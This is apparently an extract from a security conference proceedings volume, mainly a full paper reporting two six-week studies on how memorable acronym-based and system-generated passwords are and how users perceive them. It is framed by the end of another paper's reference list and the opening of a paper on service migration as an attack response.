[14] M. Warkentin, and R. Willison, “Behavioral and policy issues in information systems security: The insider threat,” European Journal of Information Systems, vol. 18, no. 2, pp. 101-105, 2009.

[15] B. Bulgurcu, H. Cavusoglu, and I. Benbasat, “Information security policy compliance: An empirical study of rationality-based beliefs and information security awareness,” MIS Quarterly, vol. 34, no. 3, pp. 523-A7, 2010.

[16] Y. Chen, K. R. Ramamurthy, and K.-W. Wen, “Organizations' information security policy compliance: Stick or carrot approach?” Journal of Management Information Systems, vol. 29, no. 3, pp. 157-188, 2012.

[17] A. Vance, P. B. Lowry, and D. Eggett, “Using accountability to reduce access policy violations in information systems,” Journal of Management Information Systems, vol. 29, no. 4, pp. 263-289, 2013.

[18] M. Siponen, “A conceptual foundation for organizational information security awareness,” Information Management & Computer Security, vol. 8, no. 1, pp. 31-41, 2000.

[19] M. E. Thomson, and R. von Solms, “Information security awareness: Educating your users effectively,” Information Management & Computer Security, vol. 6, no. 4, pp. 167-173, 1998.

[20] M. Wilson, D. E. de Zafra, S. I. Pitcher, J. D. Tressler, and J. B. Ippolito, "Information technology security training requirements: A role- and performance-based model," National Institute of Standards and Technology, 1998.

[21] (2015), "Security awareness training," Internet: http://www.mediapro.com/products/product-catalog/security-awareness-training/, [May 9, 2015].

[22] M. Wilson, and J. Hash, "Building an information technology security awareness and training program," National Institute of Standards and Technology, 2003.

[23] R. Richardson (2011, May), “15th annual 2010/2011 computer crime and security survey,” InformationWeek, [On-line], Available: http://reports.informationweek.com/abstract/21/7377/Security/research-2010-2011-csi-survey.html, [Jan. 5, 2012].

[24] B. Schneier, (2013, Mar.), "Security Awareness Training," Schneier on Security, [On-line], Available: https://www.schneier.com/blog/archives/2013/03/security_awaren_1.html [May 13, 2015].

[25] (2015), "Wombat Security Technologies," Internet: https://www.wombatsecurity.com/security-education/educate?_bt=62822866514&_bk=security%25252520education%25252520and%25252520training&_bm=p&gclid=CMLOiKv6vsUCFdQ9gQodnTIAeQ, [May 13, 2015].

[26] SE-Team, (n.d.), "What is social engineering?" [On-line], Available: http://www.social-engineer.org/about/, [May 13, 2015].

[27] J. Stanganelli, (2013, Nov.), "How to fight social engineering," eSecurity Planet, [On-line], Available: http://www.esecurityplanet.com/network-security/how-to-fight-social-engineering.html, [May 2015].

[28] S. Northcutt, J. Shenk, D. Shackleford, T. Rosenberg, R. Siles, and S. Mancini, (2006, Nov.), "Penetration testing: Assessing your overall security before attackers do," SANS, [On-line], Available: https://www.sans.org/reading-room/whitepapers/analyst/penetration-testing-assessing-security-attackers-34635, [May 13, 2015].

[29] R. W. Rogers, “A protection motivation theory of fear appeals and attitude change,” The Journal of Psychology, vol. 91, pp. 93-114, 1975.

[30] M. Karjalainen, and M. Siponen, “Toward a new meta-theory for designing information systems (IS) security training approaches,” Journal of the Association for Information Systems, vol. 12, no. 8, pp. 518-555, 2011.

[31] R. LaRose, N. J. Rifon, and R. Enbody, “Promoting personal responsibility for Internet safety,” Communications of the ACM, vol. 51, no. 3, pp. 71-76, 2008.

[32] P. Puhakainen, and M. Siponen, “Improving employees' compliance through information systems security training: An action research study,” MIS Quarterly, vol. 34, no. 4, pp. 767-A4, 2010.

[33] J. E. Maddux, and R. W. Rogers, “Protection motivation and self-efficacy: A revised theory of fear appeals and attitude change,” Journal of Experimental Social Psychology, vol. 19, pp. 469-479, 1983.

[34] P. A. Rippetoe, and R. W. Rogers, “Effects of components of protection-motivation theory on adaptive and maladaptive coping with a health threat,” Journal of Personality and Social Psychology, vol. 52, no. 3, pp. 596-604, 1987.

[35] D. L. Floyd, S. Prentice-Dunn, and R. W. Rogers, “A meta-analysis of research on protection motivation theory,” Journal of Applied Social Psychology, vol. 30, pp. 408-420, 2000.

[36] J. D’Arcy, A. Hovav, and D. Galletta, “User awareness of security countermeasures and its impact on information systems misuse: A deterrence approach,” Information Systems Research, vol. 20, no. 1, pp. 79-98, 2009.

[37] L. Myyry, M. Siponen, S. Pahnila, T. Vartiainen, and A. Vance, “What levels of moral reasoning and values explain adherence to information security rules? An empirical study,” European Journal of Information Systems, vol. 18, no. 2, pp. 126-139, 2009.

[38] A. C. Johnston, M. Warkentin, and M. Siponen, “An enhanced fear appeal rhetorical framework: Leveraging threats to the human asset through sanctioning rhetoric,” MIS Quarterly, vol. 39, no. 1, pp. 113-134, 2015.

[39] S. Taylor, and P. Todd, “Assessing IT usage: The role of prior experience,” MIS Quarterly, vol. 19, no. 4, pp. 561-570, 1995.


[40] I. Ajzen, “The theory of planned behavior,” Organizational Behavior and Human Decision Processes, vol. 50, pp. 179-211, 1991.

[41] I. Ajzen, and M. Fishbein, “The prediction of behavioral intentions in a choice situation,” Journal of Experimental Social Psychology, vol. 5, pp. 400-416, 1969.

[42] V. Venkatesh, M. G. Morris, G. B. Davis, and F. D. Davis, “User acceptance of information technology: Toward a unified view,” MIS Quarterly, vol. 27, no. 3, pp. 425-478, 2003.

[43] S. Petter, W. DeLone, and E. R. McLean, “Information systems success: The quest for the independent variables,” Journal of Management Information Systems, vol. 29, no. 4, pp. 7-61, 2013.

[44] M. Warkentin, A. C. Johnston, and J. Shropshire, “The influence of the informal social learning environment on information privacy policy compliance efficacy and intention,” European Journal of Information Systems, vol. 20, no. 3, pp. 267-284, 2011.

[45] K. Witte, “Putting the fear back into fear appeals: The extended parallel process model,” Communication Monographs, vol. 59, pp. 329-349, 1992.

[46] J. Lu, J. E. Yao, and C.-S. Yu, “Personal innovativeness, social influences and adoption of wireless Internet services via mobile technology,” Journal of Strategic Information Systems, vol. 14, pp. 245-268, 2005.

[47] A. C. Johnston, and M. Warkentin, “Fear appeals and information security behaviors: An empirical study,” MIS Quarterly, vol. 34, no. 3, pp. 549-A4, 2010.

[48] Y. Lee, and K. R. Larsen, “Threat or coping appraisal: Determinants of SMB executives' decision to adopt anti-malware software,” European Journal of Information Systems, vol. 18, no. 2, pp. 177-187, 2009.

[49] C. L. Anderson, and R. Agarwal, “Practicing safe computing: A multimethod empirical examination of home computer user security behavior intentions,” MIS Quarterly, vol. 34, no. 3, pp. 613-643, 2010.

[50] T. Herath, and H. R. Rao, “Protection motivation and deterrence: A framework for security policy compliance in organisations,” European Journal of Information Systems, vol. 18, no. 2, pp. 106-125, 2009.

[51] P. Ifinedo, “Understanding information systems security policy compliance: An integration of the theory of planned behavior and the protection motivation theory,” Computers & Security, vol. 31, no. 1, pp. 83-95, 2012.

[52] S. Pahnila, M. Siponen, and A. Mahmood, "Employees’ behavior towards IS security policy compliance," in Proceedings of the 40th Annual Hawaii International Conference on System Sciences, 2007 © IEEE.


Two Studies on Password Memorability and Perception

Delbert Hart
Computer Science Department
SUNY Plattsburgh
Plattsburgh, NY

Email: [email protected]

Abstract—Creating and remembering strong passwords is essential to ensure overall system security. This paper presents two studies that evaluate acronym based passwords and system generated passwords in terms of memorability and user perception.

Keywords—Password Security, Authentication, Human Factors

I. INTRODUCTION

Although there are many well known problems with using passwords for authentication, passwords are still the primary means of authentication in computer systems. From a user’s point of view, they have to remember too many different passwords, some with arbitrary rules. From the system’s point of view, users choose weak passwords. There are various ways to address the problems with password authentication, including password managers, password composition, blacklists, system-assigned passwords, expiration policies, reusing passwords, writing them down, etc. Opinions differ on these different mitigation strategies. Reusing passwords is largely frowned upon, but users still do it. Professionals have differing opinions about writing passwords down. And so on. As with many other issues in information systems security, choices regarding password policy end up trading user convenience against system security.

Until a replacement for passwords is widely adopted, it is important to help users choose strong passwords that they can reasonably remember. Surprisingly, this well known problem in information systems security has garnered relatively little investigation [1]. This paper describes two studies that were done to compare different password creation techniques for how memorable the passwords were to end-users and the users’ perceptions of the techniques. Most users create passwords in an ad-hoc manner. The goal of these studies was to introduce users to a more structured way to create passwords, and measure the results. Learning more about users’ attitudes towards passwords and password creation will allow more informed choices about the trade-off between usability and security.

The first study (2013) considered whether using songs or images as prompts could improve a user’s ability to create a memorable acronym based password. It was conducted during the spring of 2013, lasting 6 weeks, and involved 87 participants.

The second study (2014) occurred during the spring and fall of 2014, with two groups of participants, 51 and 93 users respectively, with each session lasting 6 weeks. The 2014 study compared three types of password generation: user-chosen acronym passwords, system-generated random strings, and system-generated random phrases.

The next section provides an overview of the design of the studies. Then the results from the studies are presented. The fifth section surveys the related work, describing how this work differs from it, and compares previous outcomes to the results in this paper. The paper concludes with some discussion and a summary of the results from the studies.

II. STUDY DESIGN

Each study was conducted as part of an undergraduate class that included password (and computer) security as a topic. In each instance, students learned about password security before the study began.

A. Goals

The goals of the studies were 1) to study the relative merits of different techniques of creating passwords and 2) to increase awareness of password best practices.

One of the problems users have with passwords is the difficulty in creating and remembering strong passwords. This is especially true given the large number of passwords needed. (One large scale study of password usage [2] estimates that the average user has to manage 25 passwords for websites alone.) By investigating the attributes of different password creation techniques, we can hopefully identify ways to make passwords less onerous and more secure. The two main features investigated in these studies are the memorability of different types of passwords, and users’ perception of the password creation techniques.

As part of the studies, we included an education component to benefit the study participants. Password education is important because many people are not aware of the best practices in the area. It is unrealistic to expect users to create strong passwords without an understanding of what makes a good password. In [3], datasets of actual passwords were examined, and 40% of the passwords were easily guessable.

The studies used in-person interviews to record password memorability and user opinions. Each student identified three participants who would be available during the six weeks of the study. The in-person interview format afforded the opportunity for user education.

Students were instructed to give participants an overview of what made a password strong and other practical advice regarding passwords. Additional materials, including a leaflet to hand out and a website, provided metaphors and other examples to relate the abstract ideas of password security to concepts the participants were more familiar with. For example, the password spaces associated with different size passwords (with different alphabets) were compared to different physical volumetric spaces. This physical metaphor was used to provide participants with an intuitive sense of the entropy associated with passwords. Entropy, determined by the length and character set used, is a common measure of password strength. For instance, a six character password with only lower case letters has a maximum entropy of about 28.2 bits (6 x log2 26), and an eight character password consisting of upper and lower case letters and numbers would have a maximum entropy of about 47.6 bits (8 x log2 62). Other measures of password strength view it in terms of how long it would take a typical attacker to guess the password. For example, Password123 may be a member of a password space of 65 bits of entropy, but would fall quickly to a dictionary based attack.
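The entropy figures above follow directly from the formula length x log2(alphabet size); a short calculation reproduces them (an illustration, not code from the study):

```python
import math

def max_entropy_bits(length: int, alphabet_size: int) -> float:
    """Maximum entropy of a password drawn uniformly at random:
    there are alphabet_size**length candidates, so log2 of that count."""
    return length * math.log2(alphabet_size)

# Six lowercase letters: about 28.2 bits.
print(round(max_entropy_bits(6, 26), 1))  # 28.2
# Eight characters from upper/lower case letters and digits: about 47.6 bits.
print(round(max_entropy_bits(8, 62), 1))  # 47.6
```

Note that these are maximum values; a human-chosen password such as Password123 occupies a far smaller effective space than its length and alphabet suggest, which is why it falls to dictionary attacks.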

Each participant was randomly assigned to one of the password creation techniques, and then asked to generate a new password using it, with the help of the student if necessary. It was emphasized that this password should only be used for this study and that they should never disclose a password that they actually used for other purposes. Participant identities were only known by the student who contacted them. No identifiable information was recorded about the participants.

After the initial contact, students followed up with the participants at 1 week, at 2 (3) weeks, and at 6 weeks. The follow-up interviews checked to see how memorable the password they had chosen was and their attitudes regarding the password. In designing the studies, one concern was that since the passwords were not used for any other purpose, it would be extremely difficult for participants to remember them. To gain more information about memorability, the participants were provided with up to three hints. The number of hints that the participant needed to recall the password was then recorded.

To keep the participant’s experience in the study positive, the amount of effort was kept to a minimum. Each participant was asked to create/remember only one password for the study. Limiting each participant to just one password also removed interference effects [4] that can occur when participants are asked to memorize multiple passwords.

B. 2013 Study

The 2013 study investigated whether using songs or images as a starting point would improve the memorability of a password as compared to acronyms based solely on text. We chose songs to study as it seems plausible that passwords based on them would be more memorable and/or enjoyable. Images were chosen as another type of prompt because of the interest in graphical/image based authentication (cf. [5]). 87 participants were randomly assigned to one of three groups: 1) text based, 2) song based, or 3) image based. The text based group was asked to base their password on a piece of prose, poetry, or dialogue that they were familiar with. Likewise the song and image groups were instructed to choose source materials that were meaningful. Before the study began, a set of examples of each type of source material was assembled to aid the participants. During the initial contact participants were asked 1) to create a new password for this study, 2) how easy creating the password was, and 3) how satisfied they were with the technique and resulting password.

At 1 week, 2 weeks, and 6 weeks the participants were interviewed again to see how memorable the password they created was. They were also asked again about their perception of the password (easiness and satisfaction).

For the text group, the hints described attributes of the source text like context, author, etc. Hints for the song prompt group could also include humming some of the melody of the song. For the image group, hints could describe the context of the image, or parts of the image.

C. 2014 Study

The 2014 study was administered twice, once in the spring and once in the fall of 2014, with 51 and 93 participants, respectively. The 2014 study compared the memorability, satisfaction, easiness, and confidence of three different methods of password generation. The 2013 study was successful in comparing acronym creation using different prompts, so the 2014 study compared acronym based passwords to system generated passwords. The first technique was a system generated random string. Randomly generated strings have always been an option for password creation, albeit not a popular one with users. The second technique was a system generated random phrase, as advocated by [6]. Random passphrases seem more appealing from a user-friendliness point of view.

Both types of system generated passwords had an entropy of 48 bits. The random string was 8 characters long, chosen from an alphabet of 64 symbols: upper and lower case letters, the numbers 0-9, and the symbols '-' and '+'. The passphrase consisted of four words randomly chosen from a list of 4,096 words. The list of words was derived from a word frequency list at [7], which identified the most commonly used words in the English language.

Participants were allowed to generate several strings/phrases to find one they liked. Although this decreases the amount of entropy in the chosen password, it was thought that providing the user the opportunity for some input in the process was worth the cost. The study used a web application to provide system generated passwords. The average number of accesses per participant was less than 3. We did not measure the effect of allowing choice on the user’s perception of the technique. Regarding the effect on password strength, a user would give up requesting replacements before the strength of the password was significantly degraded. In most cases the resulting entropy of the password would only be reduced by a couple of bits.
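Both generators can be sketched as follows. This is only an illustration of the parameters described above (8 symbols from a 64-symbol alphabet, 4 words from a 4,096-word list, each giving 48 bits); the study's actual web application and word list are not available, so the word list here is a caller-supplied placeholder:

```python
import math
import secrets
import string

# Alphabet per the paper: upper/lower case letters, digits, '-' and '+'.
ALPHABET = string.ascii_letters + string.digits + "-+"  # 52 + 10 + 2 = 64 symbols

def random_string(length: int = 8) -> str:
    """8 symbols from a 64-symbol alphabet: 8 * log2(64) = 48 bits."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def random_passphrase(wordlist: list, words: int = 4) -> str:
    """4 words from a 4,096-word list: 4 * log2(4096) = 48 bits."""
    return " ".join(secrets.choice(wordlist) for _ in range(words))

# Letting a user pick their favorite of k generated candidates costs at most
# log2(k) bits, e.g. the best of 8 candidates still has at least 45 bits:
print(48 - math.log2(8))  # 45.0
```

The final calculation shows why allowing a handful of regenerations (the observed average was under 3 accesses) only shaves a couple of bits off the 48-bit budget.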

Participants in the acronym based group were given the freedom to create any password that followed the technique.


Fig. 1. 2013 Study: Comparison of password generation techniques' memorability over time.

The resulting passwords had a large degree of variability in their strength. Most of the passwords created with this technique were weaker than the randomly generated passwords.

A hint in this study was to provide the first/next word/symbol in the acronym/phrase/string.

D. Ecological Validity

Since the passwords participants chose were not used for any other purpose, there was very little motivation for them to remember the password chosen. If the password was used more often, or if it was for something important, then it is likely that the memorability would have been improved. We did not study passwords in the context of a real system in order to safeguard the participants.

Students were allowed to choose the participants that they would interview based on the ability to perform the follow-up interviews, and some restrictions, e.g., a person could only participate once, they could not be in the class, etc. Potentially this may have biased the results. To our knowledge, there have not been any studies comparing password usage between associates of college students and the general population.

III. RESULTS

A. Memorability

Fig. 1 shows the memorability results for the 2013 study. Two sets of data are presented: 1) recall without hints and 2) recall with hints. The bottom three lines correspond to the password recall rate without any hints. All three techniques had a memorability of about 20-22 percent at the end of the study without any hints. The top lines show the participant recall with some hints. With up to three hints, between 66 and 77 percent of the participants were able to recall the password.

Fig. 2 summarizes the memorability results from the 2014 study. By the end of the study, acronym passwords had a recall rate (with no hints) of 26%, which is consistent with the 2013 study. The recall rates at the Week 1 and Week 3 interviews, at 53% and 38% respectively, were better than at the corresponding interviews in the 2013 study.

Fig. 2. 2014 Study: Comparison of password generation techniques' memorability over time.

One possible explanation for the difference between the 2013 and 2014 studies among the acronym participants is that the 2014 group had more flexibility in their choice of source phrase.

Looking at the performance without hints for the system generated passwords, it is unclear why both the random string and random phrase recall rates were weaker at the Week 3 interview than at the Week 6 interview. The random string performance was approximately 13% at Weeks 1 and 6, but dropped to 8% at Week 3. The random phrase recall rate started at 23%, dropped to 4%, and then recovered to 22%.

The system generated techniques’ recall rates with hints dropped at Week 3, and then stayed the same or decreased slightly at the Week 6 interview. More studies of system-generated password memorability are needed to better understand the behavior seen.

In the fall cohort of the 2014 study we provided the random string users with a possible mnemonic device for the generated password. After the random string was generated, the web application presented a list of common words that the random string was an acronym for. The users were not instructed to view the string as an acronym, but it was presented as an option. No significant differences in performance were found between the spring and fall random string groups in terms of memorability or perception of the technique.

Looking at the data from both studies, the acronym based passwords had better recall than the system generated passwords. This result is consistent with the generation effect [8], whereby it is easier to remember information you create than information you receive. The number of participants was not sufficient to analyze the extent to which the improved recall of the acronym passwords was due to them being weaker than the random passwords.

B. Perception

The characteristics of users’ perception investigated in these studies were satisfaction, easiness, and confidence.

Fig. 3. 2014 Study: Comparison of the different password generation techniques in user satisfaction in the password created, over time.

The “satisfaction” attribute measured whether the user thought the password technique was something that they could use for other passwords. “Easiness” described how much effort the users thought was required to use the password/password technique. “Confidence” was how strong the users thought the password was from a technical perspective.

Fig. 3 shows users’ opinions about how satisfied they were with the password they created in the 2014 study. Unsurprisingly, the acronym approach was more positively viewed than the system generated strings and phrases. One interesting result is how the random phrase approach is initially viewed more positively than the random string approach, but the two approaches are viewed almost identically by the end of the study. Recall that each participant only used one approach in the study, so they are not comparing the two approaches to each other. The members of the two groups are independently converging in their opinion. The acronym group remains relatively positive in their satisfaction with that technique. It is also interesting to note that the changes in satisfaction are not correlated with the memorability success rates.

The users' satisfaction with the techniques in the 2013 study was similar across techniques. The image and song prompts for creating the acronyms did not have any significant effect on the users' satisfaction with the underlying mechanism.

In the 2014 study, users' perception of the "easiness" attribute is shown in Fig. 4. The acronym technique has a more positive perception than either of the random techniques. The random phrase technique starts with a stronger positive view than the random string technique, but by the end of the study the two random password types are similarly perceived in terms of easiness.

Looking into these perceptions more closely, there is a statistically significant relationship between perception of satisfaction and easiness. This relationship is illustrated by the 2014 study data shown in Fig. 5. This relationship is not a side-effect of reactions to the different password creation techniques. The 2013 study's techniques were all acronym

Fig. 4. 2014 Study: Comparison of the different password generation techniques in user perception of easiness.

Fig. 5. 2014 Study: Comparison of user satisfaction with a password generation technique with how easy they thought it was.

based passwords with different prompts, and the relationship holds there also (see Fig. 6).

To further investigate the relationship between users' perception of easiness and satisfaction, the 2014 study also asked users about their confidence in the password creation technique. The goal was to differentiate the extent to which the satisfaction attribute reflected users' perception of the validity/value of the password and how much it reflected their visceral experience of using it. The confidence results for the three techniques over time are shown in Fig. 7. Users' confidence was highest for those in the random string group. Interestingly, users in the acronym group were more confident in their passwords than users in the random phrase group.

Looking at the relationship between users' perception of easiness and confidence, the 2014 study did not find any relationship between the two attributes. Fig. 8 illustrates the clear lack of correlation between the two attributes.


Fig. 6. 2013 Study: Comparison of user satisfaction with a password generation technique with how easy they thought it was.

Fig. 7. 2014 Study: Comparison of the different password generation techniques in user confidence in the password created over time.

IV. DISCUSSION

A. Memorability

Intuitively, there is an observer effect that must be considered when studying password memorability. When a participant attempts to recall a password, they are simultaneously reinforcing the memory of the password. As shown in [9], repetition is an important factor in password recall. In the 2014 study, it is possible that the Week 6 recall results improved over the Week 3 results due to the Week 3 interview. Further work is needed, though, to confirm whether this is a likely explanation.

Another interesting observation from the studies in this paper is that, even with no hints, at Week 6 participants had a success rate of 13%-22% on the randomly generated passwords. This rate was higher than expected for passwords that had minimal repetition and no usage outside of this study. It would be interesting to study the decay rate of recall over long periods of time with minimal repetition.

Fig. 8. 2014 Study: User confidence in the password created for the different password generation techniques over time.

B. Perception

The more favorable perception of the acronym based passwords compared to the random passwords was expected. It was interesting that the novelty of song/image prompted acronyms did not receive a more favorable rating compared to the text based acronyms. Perhaps the text based acronyms were just as novel to users who typically create passwords in an ad-hoc manner.

It was surprising to see the users' perception of random phrases and random strings converge. Over time, users in the random string group improved their opinion about that technique, and users in the random phrase group lowered their opinion about that approach. More investigation of the long term perception of password creation techniques would be useful to confirm this result. Perhaps system generated passwords are only negatively viewed as compared to ad-hoc password generation.

C. Education

These studies did not attempt to assess the effectiveness of the educational component of the interviews. Because of the sensitive nature of passwords in actual usage, it is difficult to directly measure the effectiveness of education.

It was instructive to see that users' confidence in random phrases was less than their confidence in random strings, even though the two approaches had the same entropy. The use of commonly used words to populate the phrases may have belied the strength of the approach. Although the educational materials included the idea of entropy and password space size as measures of password strength, we did not provide the participants with the details of the strength of the generated passwords.
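The equal-entropy point can be illustrated with back-of-the-envelope arithmetic. The alphabet and dictionary sizes below are illustrative assumptions, not the study's actual generator parameters: a uniformly random string of length n over an alphabet of size a carries n·log2(a) bits, and a phrase of k words drawn uniformly from a dictionary of size d carries k·log2(d) bits.

```python
import math

def string_entropy_bits(alphabet_size, length):
    """Entropy of a uniformly random string: length * log2(alphabet_size)."""
    return length * math.log2(alphabet_size)

def phrase_entropy_bits(dictionary_size, num_words):
    """Entropy of a phrase of words drawn uniformly from a dictionary."""
    return num_words * math.log2(dictionary_size)

# An 8-character string over 62 alphanumeric characters...
print(round(string_entropy_bits(62, 8), 1))   # 47.6 bits
# ...is about as strong as a 4-word phrase from a 4096-word dictionary,
# even though the phrase "looks" weaker because its words are common.
print(round(phrase_entropy_bits(4096, 4), 1))  # 48.0 bits
```

The calculation shows why user intuition can mislead: strength comes from the size of the space the generator draws from, not from how exotic the individual characters or words appear.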

V. RELATED WORK

Over the past 35 years, there have only been about 58 studies on password use and security [1]. Given the number of factors involved in password usage, password creation methods, and


experimental approaches, the studies in this paper provide new data to better understand password security.

One challenge in password memorability studies is the relationship of time to memory. Many password studies have spanned only hours or days. The studies in this paper both spanned six weeks. Two other relatively long term studies were done by Blocki et al. [9] and Yan et al. [10].

Blocki et al. studied the effect of repetition on the ability to recall passwords. In this study users were asked to generate passwords based on Person-Action-Object stories, where a famous person is paired with actions and objects. They were then provided a rehearsal schedule spanning up to 127 days. There were several differences between the Blocki study and the studies in this paper, including:

• The Blocki study was examining the effect that spaced repetition (practice) of the password had on the ability to recall it over time.

• The Blocki study did not provide hints, but the action and object options of the password were browsable by the participants. One of their groups was also presented with an image prompt that was shown when the password was created.

• The Blocki study utilized Amazon's Mechanical Turk service [11] for recruiting study participants. It was able to include more participants, but there was less direct contact with the participants.

• The Blocki study also had some of the participants attempt to memorize up to 4 passwords.

We view the results of the studies in this paper as consistent with Blocki et al.'s study. Users in the 2013 study with hints performed close to the level of the Blocki study. Given the Blocki study's participants' ability to browse the actions and objects before attempting the password, we believe the performance with hints is the right measure to compare. Browsing the available actions/objects provides the participants with information beyond their own memory. From the 2014 study, the user defined acronym group performed similarly. Users in the random phrase and random string groups performed about 2/3rds as well as the users in the Blocki study. Most of this difference is likely due to the increased level of repetition and practice that the Blocki study participants had. The Person-Action-Object technique may also be a contributing factor.

The Blocki study found that spaced repetition of passwords had a significant effect on participants' ability to recall the passwords. They also found that Person-Action-Object story passwords outperformed random action-object passwords.

In Yan et al.'s study, they divided 288 students into three groups, each receiving a different instruction sheet with password advice. Then, after 1 month, they attacked the participants' passwords, as well as those of 100 students not in the study. At four months they surveyed the participants about how difficult the participants found the passwords and how long they had kept written notes to help remember the passwords. Some other differences between this study and the ones in this paper:

• The focus of the Yan study was on the guessability of the participants' passwords, and the effect that the information provided on the instruction sheets had on that guessability. The studies in this paper attempted to distinguish between differences in different password techniques.

• While the Yan study provided two different password techniques to two of the groups (with the third being a control group), they had no way to measure the participants' compliance with the advice given. Although the improvement in resilience to cracking suggests that there was a positive effect, it is difficult to tell how much was due to the technique described. In contrast, the studies in this paper used an in-person interview format, hence we could be certain about the compliance of the participants.

• The uncertainty in compliance also makes it more difficult to interpret the participants' perceived level of difficulty with a technique.

One study that compared a range of password creation techniques is Shay et al. [12], which looked at 11 different variations of system generated, random passwords, including random phrases and strings. The results of this study were consistent with the studies in this paper, but there are a number of significant differences that preclude direct comparisons of the results. The Shay study recruited participants using Amazon's Mechanical Turk [11] service. The Shay study also differed in the span of time over which memorability was tested. Participants practiced the system generated password, and then were asked to recall it a few minutes later. They were then tested again after two days. The study compared the relative performance of the different password generation techniques. One challenge that the study faced was that their participants interacted with them only online. For instance, about 73% of the participants had written their password down. The Shay study also looked at user sentiment, measuring users' "annoyance", "difficulty", and "fun" on Likert scales.

A recent study by Fraune et al. [13] looked at whether using images could enhance the memorability of system generated passwords. The study had 24 participants and examined 3 picture based memory aid techniques (plus a control session). They tested them at 5 minute and at 1 week intervals. The study found that the picture techniques did aid in recall. One potential complication, though, is that the picture techniques increased the amount of time the participants spent initially during the password learning phase. In this paper's 2013 study, no significant difference was found between the image-based acronyms and the other acronym prompts. Another difference between the 2013 study and the Fraune study is that the 2013 study had user generated passwords, whereas the Fraune study used system generated passwords.

Vu et al. reported in [14] on three studies that examined the generation and interference effects associated with password memorability. The number of participants in the experiments ranged from 32 to 60 students. The participants were asked to create passwords for either 3 or 5 accounts, and were then tested again at 1 week to see how many attempts were needed to recall the passwords. In their experiments they found that 1) testing the participants at 5 minutes improved the performance at 1 week, 2) the 3 account group performed


better than the 5 account group, and 3) using an acronym mnemonic improved recall.

The studies discussed above are the ones closest to the work in this paper. There is still a need for more research in this area. The studies in this paper provide some new experimental evidence regarding password security. Some strengths of these studies were the use of interviews for the password studies, the number of follow-ups, and the length of time over which the studies were conducted.

VI. SUMMARY

The studies presented compared the relative memorability and user perception of different techniques for generating passwords. The 2013 study focused on acronym based passwords, differing in the type of source material used to generate the passwords. No significant differences were found between the text-based, image-based, and song-based acronyms in terms of memorability or perception.

The 2014 study found that the acronym based passwords had better recall than the randomly generated passwords. In general, though, the user created passwords were weaker than the randomly generated ones. Although initially the random phrase technique was viewed more favorably than the random string technique, over time attitudes towards the two random methods converged.

Both studies found a relationship between user perception of the easiness of a technique and how satisfied they were with it. Data from the 2014 study indicates that a user's confidence in the password is independent of satisfaction and easiness.

REFERENCES

[1] V. Taneski, M. Hericko, and B. Brumen, "Password security – no change in 35 years?" in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2014 37th International Convention on. IEEE, 2014, pp. 1360–1365.

[2] D. Florencio and C. Herley, "A large-scale study of web password habits," in Proceedings of the 16th International Conference on World Wide Web. ACM, 2007, pp. 657–666.

[3] D. Malone and K. Maher, "Investigating the distribution of password choices," in Proceedings of the 21st International Conference on World Wide Web, ser. WWW '12. New York, NY, USA: ACM, 2012, pp. 301–310. [Online]. Available: http://doi.acm.org/10.1145/2187836.2187878

[4] M. Bunting, "Proactive interference and item similarity in working memory," Journal of Experimental Psychology: Learning, Memory, and Cognition, vol. 32, no. 2, p. 183, 2006.

[5] R. Biddle, S. Chiasson, and P. C. Van Oorschot, "Graphical passwords: Learning from the first twelve years," ACM Computing Surveys (CSUR), vol. 44, no. 4, p. 19, 2012.

[6] R. Munroe. Password strength. [Online]. Available: http://xkcd.com/936

[7] M. Davies. Corpus of Contemporary American English. Accessed: 2014-02-23. [Online]. Available: http://www.wordfrequency.info/

[8] S. Bertsch, B. J. Pesta, R. Wiscott, and M. A. McDaniel, "The generation effect: A meta-analytic review," Memory & Cognition, vol. 35, no. 2, pp. 201–210, 2007.

[9] J. Blocki, S. Komanduri, L. F. Cranor, and A. Datta, "Spaced repetition and mnemonics enable recall of multiple strong passwords," CoRR, vol. abs/1410.1490, 2014. [Online]. Available: http://arxiv.org/abs/1410.1490

[10] J. Yan et al., "Password memorability and security: Empirical results," IEEE Security & Privacy, no. 5, pp. 25–31, 2004.

[11] Amazon Mechanical Turk. [Online]. Available: https://www.mturk.com/

[12] R. Shay, P. G. Kelley, S. Komanduri, M. L. Mazurek, B. Ur, T. Vidas, L. Bauer, N. Christin, and L. F. Cranor, "Correct horse battery staple: Exploring the usability of system-assigned passphrases," in Proceedings of the Eighth Symposium on Usable Privacy and Security, ser. SOUPS '12. New York, NY, USA: ACM, 2012, pp. 7:1–7:20. [Online]. Available: http://doi.acm.org/10.1145/2335356.2335366

[13] M. R. Fraune, K. A. Juang, J. S. Greenstein, K. C. Madathil, and R. Koikkara, "Employing user-created pictures to enhance the recall of system-generated mnemonic phrases and the security of passwords," in Proceedings of the Human Factors and Ergonomics Society Annual Meeting, vol. 57, no. 1. SAGE Publications, 2013, pp. 419–423.

[14] K.-P. L. Vu, R. W. Proctor, A. Bhargav-Spantzel, B.-L. B. Tai, J. Cook, and E. E. Schultz, "Improving password security and memorability to protect personal and organizational information," International Journal of Human-Computer Studies, vol. 65, no. 8, pp. 744–757, 2007.


A Holistic Approach for Service Migration Decision, Strategy and Scheduling

Yanjun Zuo

University of North Dakota

Grand Forks, ND, USA

Abstract—Service migration can be used as a security mechanism to dynamically move critical services from their current compromised platforms to other clean, healthy platforms in a security incident to avoid further loss and to ensure the services are continuously provided to users. We present a holistic approach for service migration decision, strategy specification and scheduling arrangement. Our approach represents the management aspect of a service migration and is essential for conducting an effective and efficient service migration to respond to malicious attacks. We apply transferable belief theory, fuzzy inference and logic reasoning to implement the decision components of this approach. The proposed methodology can be used in various service migration scenarios.

Keywords—service migration; decision; strategy; scheduling

I. INTRODUCTION

With the increasing complexity of cyber-attacks, security mechanisms must be proactive and dynamic. Reconfiguration and self-management have become essential design requirements for mission-critical systems to effectively defend against malicious attacks. Service migration represents a reconfigurable feature of a self-management system which automatically relocates critical services from their current compromised platforms to other clean, healthy platforms in case of a security incident, in order to keep those services continuously available even when some platforms have been damaged. Service migration is an important system property for improving a system's survivability in case of malicious attacks.

Technically, service migration can be used not only as a response to malicious attacks but also as part of a moving-target-defense strategy, where critical services are scheduled to relocate to other platforms periodically and systems are reconfigured in a pre-defined but seemingly random (to the attackers) fashion. In the latter case, since services run on different platforms from time to time, any knowledge gained by the attackers about the systems and the services quickly expires, thus limiting the attackers' ability to further attack the system.

